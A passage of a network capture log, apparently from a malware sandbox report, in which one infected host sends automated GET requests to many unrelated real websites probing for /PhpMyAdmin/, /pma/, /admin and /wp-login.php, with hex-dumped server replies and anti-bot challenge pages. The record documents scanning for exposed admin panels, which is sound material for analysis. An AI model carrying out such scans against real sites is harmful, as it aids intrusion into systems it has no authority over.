36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 6c 65 61 73 65 20 77 61 69 74 20 77 68 69 6c 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 69 73 20 62 65 69 6e 67 20 76 65 72 69 66 69 65 64 2e 2e 2e 3c 2f 68 31 3e 0a 3c 66 6f 72 6d 20 69 64 3d 22 77 73 69 64 63 68 6b 2d 66 6f 72 6d 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 61 63 74 69 6f 6e 3d 22 2f 7a 30 66 37 36 61 31 64 31 34 66 64 32 31 61 38 66 62 35 66 64 30 64 30 33 65 30 66 64 63 33 64 33 63 65 64 61 65 35 32 66 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 77 73 69 64 63 68 6b 22 20 6e 61 6d 65 3d 22 77 73 69 64 63 68 6b 22 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 77 65 73 74 3d 2b 28 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 5b 5d 2b 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 65 61 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b Data Ascii: 54a<!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center;}</style></head><body><h1>Please wait while your request is being verified...</h1><form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="get"><input type="hidden" id="wsidchk" name="wsidchk"/></form><script>(function(){ var west=+((+!+[])+(+!+[]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![])+(+!+[]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![])+(+![]+[])), east=+((+!+[]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+
Feb 21, 2024 00:26:13.274430037 CET	415	IN	Data Raw: 21 21 5b 5d 2b 21 21 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 21 21 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3b 7d 63 61 74 63 68 28 65 29 7b 72 Data Ascii: !![]+!![])), x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener("DOMContentLoaded",y,z) : document.attachEvent("onreadystatechange",y);}; y(function()
Feb 21, 2024 00:26:13.274446964 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
333	192.168.2.6	62754	208.109.43.169	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:13.152350903 CET	179	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: waukesha-water.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.310233116 CET	449	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:13 GMT Server: Apache Location: https://waukesha-water.com/PhpMyAdmin/ Content-Length: 246 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 61 75 6b 65 73 68 61 2d 77 61 74 65 72 2e 63 6f 6d 2f 50 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://waukesha-water.com/PhpMyAdmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
334	192.168.2.6	62722	78.47.2.70	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:13.171925068 CET	177	OUT	GET /admin HTTP/1.1 Host: breecetechnology.co.za Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.353933096 CET	413	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:13 GMT Server: Apache Content-Length: 268 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 62 72 65 65 63 65 74 65 63 68 6e 6f 6c 6f 67 79 2e 63 6f 2e 7a 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at breecetechnology.co.za Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
335	192.168.2.6	62767	217.160.122.119	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:13.190041065 CET	177	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: netzschnipsel.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.605127096 CET	378	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=15 Date: Tue, 20 Feb 2024 23:26:13 GMT Server: Apache X-Powered-By: PHP/7.3.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Location: http://www.netzschnipsel.de/PhpMyAdmin/ Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
336	192.168.2.6	61962	59.106.13.100	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:13.193541050 CET	169	OUT	GET /admin HTTP/1.1 Host: mlbx.matrix.jp Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.462044954 CET	294	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/html Content-Length: 146 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
337	192.168.2.6	62161	221.121.158.21	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:13.234114885 CET	177	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: houseguru.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.538579941 CET	1286	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Server: imunify360-webshield/1.21 Last-Modified: Tuesday, 20-Feb-2024 23:26:13 GMT Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0 cf-edge-cache: no-cache Data Raw: 35 37 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 6c 65 61 73 65 20 77 61 69 74 20 77 68 69 6c 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 69 73 20 62 65 69 6e 67 20 76 65 72 69 66 69 65 64 2e 2e 2e 3c 2f 68 31 3e 0a 3c 66 6f 72 6d 20 69 64 3d 22 77 73 69 64 63 68 6b 2d 66 6f 72 6d 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 61 63 74 69 6f 6e 3d 22 2f 7a 30 66 37 36 61 31 64 31 34 66 64 32 31 61 38 66 62 35 66 64 30 64 30 33 65 30 66 64 63 33 64 33 63 65 64 61 65 35 32 66 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 77 73 69 64 63 68 6b 22 20 6e 61 6d 65 3d 22 77 73 69 64 63 68 6b 22 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 77 65 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 65 61 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b Data Ascii: 578<!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center;}</style></head><body><h1>Please wait while your request is being verified...</h1><form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="get"><input type="hidden" id="wsidchk" name="wsidchk"/></form><script>(function(){ var west=+((+!+[]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[])), east=+((+!+[]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+[])+(+
Feb 21, 2024 00:26:13.538592100 CET	461	IN	Data Raw: 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 Data Ascii: !+[]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+[])), x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener("DOMContentLoaded",y,z) : document.attachEve
Feb 21, 2024 00:26:13.538602114 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
338	192.168.2.6	62911	85.13.138.112	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:13.246766090 CET	171	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: popular.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.425807953 CET	433	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:13 GMT Server: Apache Location: https://popular.de/PhpMyAdmin/ Content-Length: 238 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6f 70 75 6c 61 72 2e 64 65 2f 50 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://popular.de/PhpMyAdmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
339	192.168.2.6	63050	72.52.178.23	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:13.267803907 CET	167	OUT	GET /pma/ HTTP/1.1 Host: imailzone.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.432348967 CET	357	IN	HTTP/1.1 302 Moved Temporarily Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 Cache-Control: no-cache Content-Type: text/html; charset=UTF-8 Date: Tue, 20 Feb 2024 23:26:13 GMT Location: http://ww12.imailzone.com/pma/?usid=15&utid=26948360192 Pragma: no-cache Connection: Keep-Alive X-Powered-By: PHP/5.4.16 Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
340	192.168.2.6	62539	45.136.114.149	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:13.289968014 CET	171	OUT	GET /admin HTTP/1.1 Host: archononline.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.397219896 CET	439	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:13 GMT Server: Apache/2.4.18 (Ubuntu) Content-Length: 278 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 63 68 6f 6e 6f 6e 6c 69 6e 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at archononline.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
341	192.168.2.6	62347	13.232.255.130	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:13.297842979 CET	181	OUT	GET /wp-login.php HTTP/1.1 Host: amsantechnology.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.570430040 CET	417	IN	HTTP/1.1 302 Found Date: Tue, 20 Feb 2024 23:26:13 GMT Server: Apache Location: https://amsantechnology.com/wp-login.php Content-Length: 224 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 73 61 6e 74 65 63 68 6e 6f 6c 6f 67 79 2e 63 6f 6d 2f 77 70 2d 6c 6f 67 69 6e 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://amsantechnology.com/wp-login.php">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
342	192.168.2.6	63014	86.107.32.28	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:13.298217058 CET	168	OUT	GET /admin HTTP/1.1 Host: collevilca.it Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.485794067 CET	1286	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Server: BitNinja Captcha Server Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Length: 45173 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 56 69 73 69 74 6f 72 20 61 6e 74 69 2d 72 6f 62 6f 74 20 76 61 6c 69 64 61 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 0a 20 20 